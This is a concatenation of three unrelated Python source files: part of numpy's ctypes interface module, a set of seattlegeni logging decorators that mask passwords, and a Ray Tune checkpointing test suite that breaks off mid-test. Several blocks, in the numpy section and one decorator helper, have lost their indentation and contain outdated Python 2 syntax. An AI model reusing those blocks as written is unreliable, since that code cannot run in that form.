load_library : Load a C library.
ndpointer : Array restype/argtype with verification.
as_ctypes : Create a ctypes array from an ndarray.
as_array : Create an ndarray from a ctypes array.
References
----------
.. [1] "SciPy Cookbook: ctypes", http://www.scipy.org/Cookbook/Ctypes
Examples
--------
Load the C library:
>>> _lib = np.ctypeslib.load_library('libmystuff', '.') #DOCTEST: +ignore
Our result type, an ndarray that must be of type double, be 1-dimensional
and is C-contiguous in memory:
>>> array_1d_double = np.ctypeslib.ndpointer(
... dtype=np.double,
... ndim=1, flags='CONTIGUOUS') #DOCTEST: +ignore
Our C-function typically takes an array and updates its values
in-place. For example::
void foo_func(double* x, int length)
{
int i;
for (i = 0; i < length; i++) {
x[i] = i*i;
}
}
We wrap it using:
>>> _lib.foo_func.restype = None #DOCTEST: +ignore
>>> _lib.foo_func.argtypes = [array_1d_double, c_int] #DOCTEST: +ignore
Then, we're ready to call ``foo_func``:
>>> out = np.empty(15, dtype=np.double)
>>> _lib.foo_func(out, len(out)) #DOCTEST: +ignore
"""
__all__ = ['load_library', 'ndpointer', 'test', 'ctypes_load_library',
'c_intp', 'as_ctypes', 'as_array']
import sys, os
from numpy import integer, ndarray, dtype as _dtype, deprecate, array
from numpy.core.multiarray import _flagdict, flagsobj
try:
import ctypes
except ImportError:
ctypes = None
if ctypes is None:
    # ctypes is unavailable (e.g. a minimal Python build): expose stubs
    # that fail loudly on first use so importing this module still works.
    def _dummy(*args, **kwds):
        raise ImportError, "ctypes is not available."
    ctypes_load_library = _dummy
    load_library = _dummy
    as_ctypes = _dummy
    as_array = _dummy
    from numpy import intp as c_intp
else:
    import numpy.core._internal as nic
    # ctypes integer type with the platform's pointer size
    c_intp = nic._getintp_ctype()
    del nic

    # Adapted from Albert Strasheim
    def load_library(libname, loader_path):
        """Load a shared library, trying platform-specific extensions
        when libname has none.  Candidates are searched in the directory
        of loader_path (or loader_path itself when it is a directory).
        """
        if ctypes.__version__ < '1.0.1':
            import warnings
            warnings.warn("All features of ctypes interface may not work " \
                          "with ctypes < 1.0.1")
        ext = os.path.splitext(libname)[1]
        if not ext:
            # Try to load library with platform-specific name, otherwise
            # default to libname.[so|pyd]. Sometimes, these files are built
            # erroneously on non-linux platforms.
            libname_ext = ['%s.so' % libname, '%s.pyd' % libname]
            if sys.platform == 'win32':
                libname_ext.insert(0, '%s.dll' % libname)
            elif sys.platform == 'darwin':
                libname_ext.insert(0, '%s.dylib' % libname)
        else:
            libname_ext = [libname]
        loader_path = os.path.abspath(loader_path)
        if not os.path.isdir(loader_path):
            libdir = os.path.dirname(loader_path)
        else:
            libdir = loader_path
        for ln in libname_ext:
            try:
                libpath = os.path.join(libdir, ln)
                return ctypes.cdll[libpath]
            except OSError, e:
                pass
        # re-raise the OSError from the last candidate; libname_ext is
        # never empty, so 'e' is always bound by the time we get here
        raise e

    ctypes_load_library = deprecate(load_library, 'ctypes_load_library',
                                    'load_library')
def _num_fromflags(flaglist):
    """Combine a list of flag names into the corresponding bitmask."""
    return sum(_flagdict[flag] for flag in flaglist)
# Flag names recognized in ndpointer specifications.
_flagnames = ['C_CONTIGUOUS', 'F_CONTIGUOUS', 'ALIGNED', 'WRITEABLE',
              'OWNDATA', 'UPDATEIFCOPY']

def _flags_fromnum(num):
    """Expand a flags bitmask into the list of set flag names."""
    return [name for name in _flagnames if num & _flagdict[name]]
class _ndptr(object):
    # Base class for the types generated by ndpointer().  from_param
    # validates an ndarray argument against the class-level
    # _dtype_/_ndim_/_shape_/_flags_ constraints (any of which may be
    # None, meaning unconstrained) and hands back its .ctypes attribute
    # for the foreign-function call.
    def from_param(cls, obj):
        if not isinstance(obj, ndarray):
            raise TypeError, "argument must be an ndarray"
        if cls._dtype_ is not None \
               and obj.dtype != cls._dtype_:
            raise TypeError, "array must have data type %s" % cls._dtype_
        if cls._ndim_ is not None \
               and obj.ndim != cls._ndim_:
            raise TypeError, "array must have %d dimension(s)" % cls._ndim_
        if cls._shape_ is not None \
               and obj.shape != cls._shape_:
            raise TypeError, "array must have shape %s" % str(cls._shape_)
        if cls._flags_ is not None \
               and ((obj.flags.num & cls._flags_) != cls._flags_):
            raise TypeError, "array must have flags %s" % \
                  _flags_fromnum(cls._flags_)
        return obj.ctypes
    from_param = classmethod(from_param)
# Factory for an array-checking class with from_param defined for
# use with ctypes argtypes mechanism
_pointer_type_cache = {}
def ndpointer(dtype=None, ndim=None, shape=None, flags=None):
    """
    Array-checking restype/argtypes.

    An ndpointer instance is used to describe an ndarray in restypes
    and argtypes specifications.  This approach is more flexible than
    using, for example, ``POINTER(c_double)``, since several restrictions
    can be specified, which are verified upon calling the ctypes function.
    These include data type, number of dimensions, shape and flags.  If a
    given array does not satisfy the specified restrictions,
    a ``TypeError`` is raised.

    Parameters
    ----------
    dtype : data-type, optional
        Array data-type.
    ndim : int, optional
        Number of array dimensions.
    shape : tuple of ints, optional
        Array shape.
    flags : string or tuple of strings
        Array flags; may be one or more of:

          - C_CONTIGUOUS / C / CONTIGUOUS
          - F_CONTIGUOUS / F / FORTRAN
          - OWNDATA / O
          - WRITEABLE / W
          - ALIGNED / A
          - UPDATEIFCOPY / U

    Examples
    --------
    >>> clib.somefunc.argtypes = [np.ctypeslib.ndpointer(dtype=float64,
    ...                                                  ndim=1,
    ...                                                  flags='C_CONTIGUOUS')]
    >>> clib.somefunc(np.array([1, 2, 3], dtype=np.float64))

    """
    if dtype is not None:
        dtype = _dtype(dtype)
    # Normalize `flags` to a bitmask `num` plus the list of flag names.
    num = None
    if flags is not None:
        if isinstance(flags, str):
            flags = flags.split(',')
        elif isinstance(flags, (int, integer)):
            num = flags
            flags = _flags_fromnum(num)
        elif isinstance(flags, flagsobj):
            num = flags.num
            flags = _flags_fromnum(num)
        if num is None:
            try:
                flags = [x.strip().upper() for x in flags]
            except Exception:
                # narrowed from a bare `except:` so SystemExit and
                # KeyboardInterrupt are not swallowed
                raise TypeError("invalid flags specification")
            num = _num_fromflags(flags)
    cache_key = (dtype, ndim, shape, num)
    try:
        return _pointer_type_cache[cache_key]
    except KeyError:
        pass
    # Build a descriptive class name from the constraints.
    if dtype is None:
        name = 'any'
    elif dtype.names:
        name = str(id(dtype))
    else:
        name = dtype.str
    if ndim is not None:
        name += "_%dd" % ndim
    if shape is not None:
        try:
            strshape = [str(x) for x in shape]
        except TypeError:
            # a scalar shape like shape=3 means a 1-tuple (3,)
            strshape = [str(shape)]
            shape = (shape,)
        shape = tuple(shape)
        name += "_"+"x".join(strshape)
    if flags is not None:
        name += "_"+"_".join(flags)
    else:
        flags = []
    klass = type("ndpointer_%s"%name, (_ndptr,),
                 {"_dtype_": dtype,
                  "_shape_" : shape,
                  "_ndim_" : ndim,
                  "_flags_" : num})
    # BUG FIX: store the class under the same (dtype, ndim, shape, num)
    # key used for the lookup above.  The old code cached under `dtype`
    # alone, so the cache never hit on the full key, and a later lookup
    # keyed only by dtype could hand back a class with the wrong
    # ndim/shape/flags constraints.
    _pointer_type_cache[cache_key] = klass
    return klass
if ctypes is not None:
    # Short alias used throughout the ctypes-dependent section below.
    ct = ctypes
    ################################################################
    # simple types

    # maps the numpy typecodes like '<f8' to simple ctypes types like
    # c_double. Filled in by prep_simple.
    _typecodes = {}
def prep_simple(simple_type, typestr):
"""Given a ctypes simple type, construct and attach an
__array_interface__ property to it if it does not yet have one.
"""
try: simple_type.__array_interface__
except AttributeError: pass
else: return
_typecodes[typestr] = simple_type
def __array_interface__(self):
return {'descr': [('', typestr)],
'__ref': self,
'strides': None,
'shape': (),
'version': 3,
'typestr': typestr,
'data': (ct.addressof(self), False),
}
simple_type.__array_interface__ = property(__array_interface__)
if sys.byteorder == "little":
TYPESTR = "<%c%d"
else:
TYPESTR = ">%c%d"
simple_types = [
((ct.c_byte, ct.c_short, ct.c_int, ct.c_long, ct.c_longlong), "i"),
((ct.c_ubyte, ct.c_ushort, ct.c_uint, ct.c_ulong, ct.c_ulonglong), "u"),
((ct.c_float, ct.c_double), "f"),
]
# Prep that numerical ctypes types:
for types, code in simple_types:
for tp in types:
prep_simple(tp, TYPESTR % (code, ct.sizeof(tp)))
################################################################
# array types
_ARRAY_TYPE = type(ct.c_int * 1)
def prep_array(array_type):
"""Given a ctypes array type, construct and attach an
__array_interface__ property to it if it does not yet have one.
"""
try: array_type.__array_interface__
except AttributeError: pass
else: return
shape = []
ob = array_type
while type(ob) == _ARRAY_TYPE:
shape.append(ob._length_)
ob = ob._type_
shape = tuple(shape)
ai = ob().__array_interface__
descr = ai['descr']
typestr = ai['typestr']
def __array_interface__(self):
return {'descr': descr,
'__ref': self,
'strides': None,
'shape': shape,
'version': 3,
'typestr': typestr,
'data': (ct.addressof(self), False),
}
array_type.__array_interface__ = property(__array_interface__)
################################################################
# public functions
def as_array(obj):
"""Create a numpy array from a ctypes array. The numpy array
shares the memory with the ctypes object."""
tp = type(obj)
try: tp.__array_interface__
except AttributeError: prep_array(tp)
return array(obj, copy=False)
def as_ctypes(obj):
"""Create and return a ctypes object from a numpy array. Actually
anything that exposes the __array_interface__ is accepted."""
ai = obj.__array_interface__
if ai["strides"]:
raise TypeError("strided arrays not supported")
if ai["version"] != 3:
raise TypeError("only __array_interface__ version 3 supported")
addr, readonly = ai["data"]
if readonly:
raise TypeError("readonly arrays unsupported")
tp = _typecodes[ai["typestr"]]
for dim in ai["shape"][::-1]:
tp = tp * dim
result = tp.from_address(addr)
result.__keep = ai
return result
|
|
"""
<Program>
decorators.py
<Started>
6 July 2009
<Author>
Justin Samuel
<Purpose>
These define the decorators used in seattlegeni code. Decorators are something
we try to avoid using, so they should only be used if absolutely necessary.
Currently we only use them for logging function calls (such as the public
api functions).
The simple_decorator approach here is borrowed from:
http://wiki.python.org/moin/PythonDecoratorLibrary
The general idea is that we have one simple_decorator that does magic python
stuff (_simple_decorator), and we write our actual decorators that are more
sane and are themselves decorated with the _simple_decorator.
"""
import datetime
from seattlegeni.common.util import log
from django.http import HttpRequest
def _simple_decorator(decorator):
"""
This is not for use outside of this module.
This decorator can be used to turn simple functions into well-behaved
decorators, so long as the decorators are fairly simple. If a decorator
expects a function and returns a function (no descriptors), and if it doesn't
modify function attributes or docstring, then it is eligible to use this.
Simply apply @simple_decorator to your decorator and it will automatically
preserve the docstring and function attributes of functions to which it is
applied.
"""
def new_decorator(f):
g = decorator(f)
g.__name__ = f.__name__
g.__doc__ = f.__doc__
g.__dict__.update(f.__dict__)
return g
# Now a few lines needed to make simple_decorator itself
# be a well-behaved decorator.
new_decorator.__name__ = decorator.__name__
new_decorator.__doc__ = decorator.__doc__
new_decorator.__dict__.update(decorator.__dict__)
return new_decorator
def _get_timedelta_str(starttime):
return str(datetime.datetime.now() - starttime)
@_simple_decorator
def log_function_call(func):
    """
    <Purpose>
    Logs when the function is called, along with the arguments, and logs when
    the function returns, along with the return value. Will also log any
    exception that is raised.
    Be careful when using this to log functions that take sensitive values
    (e.g. passwords) as arguments or that return sensitive values (e.g.
    private keys).
    """
    # The name "do_logging_func_call" is never seen anywhere but here.
    def do_logging_func_call(*args, **kwargs):
        _log_call_info(func, args, kwargs)
        starttime = datetime.datetime.now()
        try:
            result = func(*args, **kwargs)
            log.debug('Returning from %s (module %s) (time %s): %s' % (func.__name__, func.__module__, _get_timedelta_str(starttime), str(result)))
            return result
        # "except ... as" is valid on python 2.6+ and required on python 3;
        # the old comma form ("except Exception, e") is a py3 syntax error.
        except Exception as e:
            log.debug('Exception from %s (module %s): %s %s' % (func.__name__, func.__module__, type(e), str(e)))
            raise
    return do_logging_func_call
@_simple_decorator
def log_function_call_without_return(func):
    """
    <Purpose>
    Logs when the function is called, along with the arguments, and logs when
    the function returns, but doesn't log the return value. Will also log any
    exception that is raised.
    Be careful when using this to log functions that take sensitive values
    (e.g. passwords) as arguments.
    """
    # The name "do_logging_func_call" is never seen anywhere but here.
    def do_logging_func_call(*args, **kwargs):
        _log_call_info(func, args, kwargs)
        starttime = datetime.datetime.now()
        try:
            result = func(*args, **kwargs)
            log.debug('Returning from %s (module %s) (time %s): [Not logging return value]' % (func.__name__, func.__module__, _get_timedelta_str(starttime)))
            return result
        # py2.6+/py3-compatible exception syntax (the comma form breaks py3).
        except Exception as e:
            log.debug('Exception from %s (module %s): %s %s' % (func.__name__, func.__module__, type(e), str(e)))
            raise
    return do_logging_func_call
@_simple_decorator
def log_function_call_without_arguments(func):
    """
    <Purpose>
    Logs when the function is called, without the arguments, and logs when
    the function returns, including the return value. Will also log any
    exception that is raised.
    Be careful when using this to log functions that return sensitive values
    (e.g. private keys).
    """
    # The name "do_logging_func_call" is never seen anywhere but here.
    def do_logging_func_call(*args, **kwargs):
        log.debug('Calling: %s (module %s), args: [Not logging], kwargs: [Not logging].' %
                  (func.__name__, func.__module__))
        starttime = datetime.datetime.now()
        try:
            result = func(*args, **kwargs)
            log.debug('Returning from %s (module %s) (time %s): %s' % (func.__name__, func.__module__, _get_timedelta_str(starttime), str(result)))
            return result
        # py2.6+/py3-compatible exception syntax (the comma form breaks py3).
        except Exception as e:
            log.debug('Exception from %s (module %s): %s %s' % (func.__name__, func.__module__, type(e), str(e)))
            raise
    return do_logging_func_call
@_simple_decorator
def log_function_call_and_only_first_argument(func):
    """
    <Purpose>
    Logs when the function is called, with only the first argument, and logs
    when the function returns, including the return value. Will also log any
    exception that is raised.
    Be careful when using this to log functions that return sensitive values
    (e.g. private keys).
    The reason this decorator exists is that there are a handful of functions
    that take sensitive data as arguments (like passwords) but they are
    not the first argument, and logging the first argument could be useful.
    This could probably be accomplished by making a decorator that itself
    took arguments about which arguments to log, but that crosses well over
    the line of maintainability by people who didn't write the initial code.
    """
    # The name "do_logging_func_call" is never seen anywhere but here.
    def do_logging_func_call(*args, **kwargs):
        # NOTE(review): assumes at least one positional argument is passed;
        # args[0] would raise IndexError otherwise -- confirm callers.
        log.debug('Calling: %s (module %s), 1st arg: %s, other args: [Not logging].' %
                  (func.__name__, func.__module__, str(_get_cleaned_args(args)[0])))
        starttime = datetime.datetime.now()
        try:
            result = func(*args, **kwargs)
            log.debug('Returning from %s (module %s) (time %s): %s' % (func.__name__, func.__module__, _get_timedelta_str(starttime), str(result)))
            return result
        # py2.6+/py3-compatible exception syntax (the comma form breaks py3).
        except Exception as e:
            log.debug('Exception from %s (module %s): %s %s' % (func.__name__, func.__module__, type(e), str(e)))
            raise
    return do_logging_func_call
@_simple_decorator
def log_function_call_without_first_argument(func):
    """
    <Purpose>
    Logs the function called without the first argument (unless it's a kwarg),
    and logs when the function returns including the return value. Will also log
    any exception that is raised.
    Be careful when using this to log functions that return sensitive values
    (e.g. private keys).
    The reason this decorator exists is that there are functions that take
    a sensitive value (such as the backend authcode) as the first argument,
    and we don't want that ending up in the logs.
    """
    # The name "do_logging_func_call" is never seen anywhere but here.
    def do_logging_func_call(*args, **kwargs):
        # BUGFIX: use _get_cleaned_kwargs for the kwargs dict.  Passing a
        # dict to _get_cleaned_args iterated only the key names (losing the
        # values) and skipped the password masking _get_cleaned_kwargs does.
        log.debug('Calling: %s (module %s), 1st arg: [Not logging], other args: %s, kwargs: %s.' %
                  (func.__name__, func.__module__, str(_get_cleaned_args(args)[1:]), str(_get_cleaned_kwargs(kwargs))))
        starttime = datetime.datetime.now()
        try:
            result = func(*args, **kwargs)
            log.debug('Returning from %s (module %s) (time %s): %s' % (func.__name__, func.__module__, _get_timedelta_str(starttime), str(result)))
            return result
        # py2.6+/py3-compatible exception syntax (the comma form breaks py3).
        except Exception as e:
            log.debug('Exception from %s (module %s): %s %s' % (func.__name__, func.__module__, type(e), str(e)))
            raise
    return do_logging_func_call
def _log_call_info(func, args, kwargs):
    # Shared helper so the "Calling: ..." line isn't duplicated in both
    # log_function_call and log_function_call_without_return.
    # BUGFIX: clean kwargs with _get_cleaned_kwargs.  Passing the dict to
    # _get_cleaned_args iterated only its keys (values were never logged)
    # and bypassed the password masking that _get_cleaned_kwargs performs.
    log.debug('Calling: %s (module %s), args: %s, kwargs: %s.' %
              (func.__name__, func.__module__, str(_get_cleaned_args(args)), str(_get_cleaned_kwargs(kwargs))))
def _get_cleaned_args(args):
    """Return *args* as a tuple with HttpRequest instances replaced by a
    short placeholder string (request objects are huge and uninteresting
    in logs)."""
    return tuple("<HttpRequest>" if isinstance(arg, HttpRequest) else arg
                 for arg in args)
def _get_cleaned_kwargs(kwargs):
    """Return a copy of *kwargs* safe for logging: HttpRequest values are
    replaced by a placeholder and any 'password' value is masked."""
    cleaned = {}
    for key, value in kwargs.items():
        if isinstance(value, HttpRequest):
            cleaned[key] = "<HttpRequest>"
        elif key == "password":
            # Never let credentials end up in the logs.
            cleaned[key] = "***"
        else:
            cleaned[key] = value
    return cleaned
|
|
import json
import os
import sys
import shutil
import tempfile
import unittest
import ray
from ray.rllib import _register_all
from ray import tune
from ray.tune.logger import NoopLogger
from ray.tune.utils.placement_groups import PlacementGroupFactory
from ray.tune.utils.trainable import TrainableUtil
from ray.tune.function_runner import with_parameters, wrap_function, FuncCheckpointUtil
from ray.tune.result import DEFAULT_METRIC, TRAINING_ITERATION
from ray.tune.schedulers import ResourceChangingScheduler
def creator_generator(logdir):
    """Build a logger_creator callable producing NoopLoggers rooted at *logdir*."""
    return lambda config: NoopLogger(config, logdir)
class FuncCheckpointUtilTest(unittest.TestCase):
    """Tests for FuncCheckpointUtil's checkpoint-directory helpers."""
    def setUp(self):
        # Fresh scratch directory per test; removed in tearDown.
        self.logdir = tempfile.mkdtemp()
    def tearDown(self):
        shutil.rmtree(self.logdir)
    def testEmptyCheckpoint(self):
        """A freshly created null checkpoint dir is recognized as null."""
        checkpoint_dir = FuncCheckpointUtil.mk_null_checkpoint_dir(self.logdir)
        assert FuncCheckpointUtil.is_null_checkpoint(checkpoint_dir)
    def testTempCheckpointDir(self):
        """A freshly created temp checkpoint dir is recognized as temporary."""
        checkpoint_dir = FuncCheckpointUtil.mk_temp_checkpoint_dir(self.logdir)
        assert FuncCheckpointUtil.is_temp_checkpoint_dir(checkpoint_dir)
    def testConvertTempToPermanent(self):
        """Promoting a temp checkpoint yields a distinct, permanent directory."""
        checkpoint_dir = FuncCheckpointUtil.mk_temp_checkpoint_dir(self.logdir)
        new_checkpoint_dir = FuncCheckpointUtil.create_perm_checkpoint(
            checkpoint_dir, self.logdir, step=4
        )
        # The promoted dir must be discoverable by TrainableUtil...
        assert new_checkpoint_dir == TrainableUtil.find_checkpoint_dir(
            new_checkpoint_dir
        )
        assert os.path.exists(new_checkpoint_dir)
        # ...and no longer classified as temporary.
        assert not FuncCheckpointUtil.is_temp_checkpoint_dir(new_checkpoint_dir)
        # A new temp dir must not collide with the promoted one.
        tmp_checkpoint_dir = FuncCheckpointUtil.mk_temp_checkpoint_dir(self.logdir)
        assert tmp_checkpoint_dir != new_checkpoint_dir
class FunctionCheckpointingTest(unittest.TestCase):
    """Save/restore behavior of function trainables (no ray.init required)."""
    def setUp(self):
        # Shared tempdir and logger factory for every trainable in a test.
        self.logdir = tempfile.mkdtemp()
        self.logger_creator = creator_generator(self.logdir)
    def tearDown(self):
        shutil.rmtree(self.logdir)
    def testCheckpointReuse(self):
        """Test that repeated save/restore never reuses same checkpoint dir."""
        def train(config, checkpoint_dir=None):
            if checkpoint_dir:
                count = sum(
                    "checkpoint-" in path for path in os.listdir(checkpoint_dir)
                )
                # Exactly one checkpoint file per restored directory.
                assert count == 1, os.listdir(checkpoint_dir)
            for step in range(20):
                with tune.checkpoint_dir(step=step) as checkpoint_dir:
                    path = os.path.join(checkpoint_dir, "checkpoint-{}".format(step))
                    open(path, "a").close()
                tune.report(test=step)
        wrapped = wrap_function(train)
        checkpoint = None
        # 5 trainable instances, 2 train() calls each -> 10 iterations total.
        for i in range(5):
            new_trainable = wrapped(logger_creator=self.logger_creator)
            if checkpoint:
                new_trainable.restore(checkpoint)
            for i in range(2):
                result = new_trainable.train()
            checkpoint = new_trainable.save()
            new_trainable.stop()
        assert result[TRAINING_ITERATION] == 10
    def testCheckpointReuseObject(self):
        """Test that repeated save/restore never reuses same checkpoint dir."""
        # Same as testCheckpointReuse but via in-memory checkpoint objects.
        def train(config, checkpoint_dir=None):
            if checkpoint_dir:
                count = sum(
                    "checkpoint-" in path for path in os.listdir(checkpoint_dir)
                )
                assert count == 1, os.listdir(checkpoint_dir)
            for step in range(20):
                with tune.checkpoint_dir(step=step) as checkpoint_dir:
                    path = os.path.join(checkpoint_dir, "checkpoint-{}".format(step))
                    open(path, "a").close()
                tune.report(test=step)
        wrapped = wrap_function(train)
        checkpoint = None
        for i in range(5):
            new_trainable = wrapped(logger_creator=self.logger_creator)
            if checkpoint:
                new_trainable.restore_from_object(checkpoint)
            for i in range(2):
                result = new_trainable.train()
            checkpoint = new_trainable.save_to_object()
            new_trainable.stop()
        self.assertTrue(result[TRAINING_ITERATION] == 10)
    def testCheckpointReuseObjectWithoutTraining(self):
        """Test that repeated save/restore never reuses same checkpoint dir."""
        # Restoring without training in between must not corrupt state.
        def train(config, checkpoint_dir=None):
            if checkpoint_dir:
                count = sum(
                    "checkpoint-" in path for path in os.listdir(checkpoint_dir)
                )
                assert count == 1, os.listdir(checkpoint_dir)
            for step in range(20):
                with tune.checkpoint_dir(step=step) as checkpoint_dir:
                    path = os.path.join(checkpoint_dir, "checkpoint-{}".format(step))
                    open(path, "a").close()
                tune.report(test=step)
        wrapped = wrap_function(train)
        new_trainable = wrapped(logger_creator=self.logger_creator)
        for i in range(2):
            result = new_trainable.train()
        checkpoint = new_trainable.save_to_object()
        new_trainable.stop()
        # Restore and immediately stop (no training) -- should be harmless.
        new_trainable2 = wrapped(logger_creator=self.logger_creator)
        new_trainable2.restore_from_object(checkpoint)
        new_trainable2.stop()
        # Restore again and train one more iteration on top of the two saved.
        new_trainable2 = wrapped(logger_creator=self.logger_creator)
        new_trainable2.restore_from_object(checkpoint)
        result = new_trainable2.train()
        new_trainable2.stop()
        self.assertTrue(result[TRAINING_ITERATION] == 3)
    def testReuseNullCheckpoint(self):
        """A checkpoint from a function that never checkpoints is reusable."""
        def train(config, checkpoint_dir=None):
            assert not checkpoint_dir
            for step in range(10):
                tune.report(test=step)
        # Create checkpoint
        wrapped = wrap_function(train)
        checkpoint = None
        new_trainable = wrapped(logger_creator=self.logger_creator)
        new_trainable.train()
        checkpoint = new_trainable.save()
        new_trainable.stop()
        # Use the checkpoint a couple of times
        for i in range(3):
            new_trainable = wrapped(logger_creator=self.logger_creator)
            new_trainable.restore(checkpoint)
            new_trainable.stop()
        # Make sure the result is still good
        new_trainable = wrapped(logger_creator=self.logger_creator)
        new_trainable.restore(checkpoint)
        result = new_trainable.train()
        checkpoint = new_trainable.save()
        new_trainable.stop()
        self.assertTrue(result[TRAINING_ITERATION] == 1)
    def testMultipleNullCheckpoints(self):
        """Repeated save/restore of null (empty) checkpoints on disk."""
        def train(config, checkpoint_dir=None):
            assert not checkpoint_dir
            for step in range(10):
                tune.report(test=step)
        wrapped = wrap_function(train)
        checkpoint = None
        for i in range(5):
            new_trainable = wrapped(logger_creator=self.logger_creator)
            if checkpoint:
                new_trainable.restore(checkpoint)
            result = new_trainable.train()
            checkpoint = new_trainable.save()
            new_trainable.stop()
        self.assertTrue(result[TRAINING_ITERATION] == 1)
    def testMultipleNullMemoryCheckpoints(self):
        """Repeated save/restore of null checkpoints via in-memory objects."""
        def train(config, checkpoint_dir=None):
            assert not checkpoint_dir
            for step in range(10):
                tune.report(test=step)
        wrapped = wrap_function(train)
        checkpoint = None
        for i in range(5):
            new_trainable = wrapped(logger_creator=self.logger_creator)
            if checkpoint:
                new_trainable.restore_from_object(checkpoint)
            result = new_trainable.train()
            checkpoint = new_trainable.save_to_object()
            new_trainable.stop()
        assert result[TRAINING_ITERATION] == 1
    def testFunctionNoCheckpointing(self):
        """save/restore works even when the function never checkpoints."""
        def train(config, checkpoint_dir=None):
            if checkpoint_dir:
                assert os.path.exists(checkpoint_dir)
            for step in range(10):
                tune.report(test=step)
        wrapped = wrap_function(train)
        new_trainable = wrapped(logger_creator=self.logger_creator)
        result = new_trainable.train()
        checkpoint = new_trainable.save()
        new_trainable.stop()
        new_trainable2 = wrapped(logger_creator=self.logger_creator)
        new_trainable2.restore(checkpoint)
        result = new_trainable2.train()
        self.assertEqual(result[TRAINING_ITERATION], 1)
        checkpoint = new_trainable2.save()
        new_trainable2.stop()
    def testFunctionRecurringSave(self):
        """This tests that save and restore are commutative."""
        def train(config, checkpoint_dir=None):
            if checkpoint_dir:
                assert os.path.exists(checkpoint_dir)
            for step in range(10):
                # Checkpoint every third step only.
                if step % 3 == 0:
                    with tune.checkpoint_dir(step=step) as checkpoint_dir:
                        path = os.path.join(checkpoint_dir, "checkpoint")
                        with open(path, "w") as f:
                            f.write(json.dumps({"step": step}))
                tune.report(test=step)
        wrapped = wrap_function(train)
        new_trainable = wrapped(logger_creator=self.logger_creator)
        new_trainable.train()
        # Object save -> object restore -> disk save, then restore from disk.
        checkpoint_obj = new_trainable.save_to_object()
        new_trainable.restore_from_object(checkpoint_obj)
        checkpoint = new_trainable.save()
        new_trainable.stop()
        new_trainable2 = wrapped(logger_creator=self.logger_creator)
        new_trainable2.restore(checkpoint)
        new_trainable2.train()
        new_trainable2.stop()
    def testFunctionImmediateSave(self):
        """This tests that save and restore are commutative."""
        def train(config, checkpoint_dir=None):
            if checkpoint_dir:
                assert os.path.exists(checkpoint_dir)
            for step in range(10):
                with tune.checkpoint_dir(step=step) as checkpoint_dir:
                    print(checkpoint_dir)
                    path = os.path.join(checkpoint_dir, "checkpoint-{}".format(step))
                    open(path, "w").close()
                tune.report(test=step)
        wrapped = wrap_function(train)
        new_trainable = wrapped(logger_creator=self.logger_creator)
        new_trainable.train()
        new_trainable.train()
        checkpoint_obj = new_trainable.save_to_object()
        new_trainable.stop()
        new_trainable2 = wrapped(logger_creator=self.logger_creator)
        new_trainable2.restore_from_object(checkpoint_obj)
        # Saving right after restore must not leak extra temp dirs.
        checkpoint_obj = new_trainable2.save_to_object()
        new_trainable2.train()
        result = new_trainable2.train()
        assert sum("tmp" in path for path in os.listdir(self.logdir)) == 1
        new_trainable2.stop()
        # All temporary checkpoint dirs are cleaned up on stop().
        assert sum("tmp" in path for path in os.listdir(self.logdir)) == 0
        assert result[TRAINING_ITERATION] == 4
class FunctionApiTest(unittest.TestCase):
    """End-to-end tests of the tune function API (runs against a real ray cluster)."""
    def setUp(self):
        ray.init(num_cpus=4, num_gpus=0, object_store_memory=150 * 1024 * 1024)
    def tearDown(self):
        ray.shutdown()
        _register_all()  # re-register the evicted objects
    def testCheckpointError(self):
        """Durable-checkpoint options are rejected for checkpoint-less functions."""
        def train(config, checkpoint_dir=False):
            pass
        with self.assertRaises(ValueError):
            tune.run(train, checkpoint_freq=1)
        with self.assertRaises(ValueError):
            tune.run(train, checkpoint_at_end=True)
    def testCheckpointFunctionAtEnd(self):
        """A checkpoint written on the last step is kept as the trial checkpoint."""
        def train(config, checkpoint_dir=False):
            for i in range(10):
                tune.report(test=i)
            with tune.checkpoint_dir(step=10) as checkpoint_dir:
                checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
                with open(checkpoint_path, "w") as f:
                    f.write("hello")
        [trial] = tune.run(train).trials
        assert os.path.exists(os.path.join(trial.checkpoint.value, "ckpt.log"))
    def testCheckpointFunctionAtEndContext(self):
        # NOTE(review): body is identical to testCheckpointFunctionAtEnd --
        # possibly redundant; confirm intent before removing.
        def train(config, checkpoint_dir=False):
            for i in range(10):
                tune.report(test=i)
            with tune.checkpoint_dir(step=10) as checkpoint_dir:
                checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
                with open(checkpoint_path, "w") as f:
                    f.write("hello")
        [trial] = tune.run(train).trials
        assert os.path.exists(os.path.join(trial.checkpoint.value, "ckpt.log"))
    def testVariousCheckpointFunctionAtEnd(self):
        """The final post-loop checkpoint wins over the per-step ones."""
        def train(config, checkpoint_dir=False):
            for i in range(10):
                with tune.checkpoint_dir(step=i) as checkpoint_dir:
                    checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
                    with open(checkpoint_path, "w") as f:
                        f.write("hello")
                tune.report(test=i)
            # Final checkpoint after the loop, written to a different file.
            with tune.checkpoint_dir(step=i) as checkpoint_dir:
                checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log2")
                with open(checkpoint_path, "w") as f:
                    f.write("goodbye")
        [trial] = tune.run(train, keep_checkpoints_num=3).trials
        assert os.path.exists(os.path.join(trial.checkpoint.value, "ckpt.log2"))
    def testReuseCheckpoint(self):
        """restore= resumes a run from the last checkpoint of a prior run."""
        def train(config, checkpoint_dir=None):
            itr = 0
            if checkpoint_dir:
                with open(os.path.join(checkpoint_dir, "ckpt.log"), "r") as f:
                    itr = int(f.read()) + 1
            for i in range(itr, config["max_iter"]):
                with tune.checkpoint_dir(step=i) as checkpoint_dir:
                    checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
                    with open(checkpoint_path, "w") as f:
                        f.write(str(i))
                tune.report(test=i, training_iteration=i)
        [trial] = tune.run(
            train,
            config={"max_iter": 5},
        ).trials
        last_ckpt = trial.checkpoint.value
        assert os.path.exists(os.path.join(trial.checkpoint.value, "ckpt.log"))
        # Resuming with a higher max_iter should only run the remaining 5 iters.
        analysis = tune.run(train, config={"max_iter": 10}, restore=last_ckpt)
        trial_dfs = list(analysis.trial_dataframes.values())
        assert len(trial_dfs[0]["training_iteration"]) == 5
    def testRetry(self):
        """max_failures restarts a failed trial from its last checkpoint."""
        def train(config, checkpoint_dir=None):
            restored = bool(checkpoint_dir)
            itr = 0
            if checkpoint_dir:
                with open(os.path.join(checkpoint_dir, "ckpt.log"), "r") as f:
                    itr = int(f.read()) + 1
            for i in range(itr, 10):
                # Fail once, on the first (non-restored) attempt only.
